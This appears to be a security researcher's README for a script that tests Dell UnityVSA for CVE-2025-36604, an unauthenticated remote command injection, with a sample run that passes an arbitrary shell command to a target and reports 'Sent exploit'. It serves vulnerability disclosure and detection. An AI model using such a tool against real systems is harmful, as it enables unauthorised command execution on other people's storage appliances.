watchTowr-vs-Dell-UnityVSA-CVE-2025-36604

Detection Artifact Generator for Dell UnityVSA CVE-2025-36604

CVE-2025-36604.mp4

See our blog post for technical details

Detection in Action

python watchTowr-vs-Dell-UnityVSA-PreAuth-CVE-2025-36604.py --target https://192.168.5.45/ --command "touch /tmp/boom"
                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        watchTowr-vs-Dell-UnityVSA-CVE-2025-36604.py

        (*) Dell UnityVSA Unauthenticated Remote Command Injection Detection Artifact Generator

          - Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)

        CVEs: [CVE-2025-36604]

[+] Sent exploit to https://192.168.5.45

Description

This script attempts to detect if Dell UnityVSA is vulnerable to CVE-2025-36604

Affected Versions

Versions prior to 5.5.1 are affected by this issue

For more information visit Dell UnityVSA Security Update Notes

Follow watchTowr Labs

For the latest security research follow the watchTowr Labs Team

• https://labs.watchtowr.com/

• https://x.com/watchtowrcyber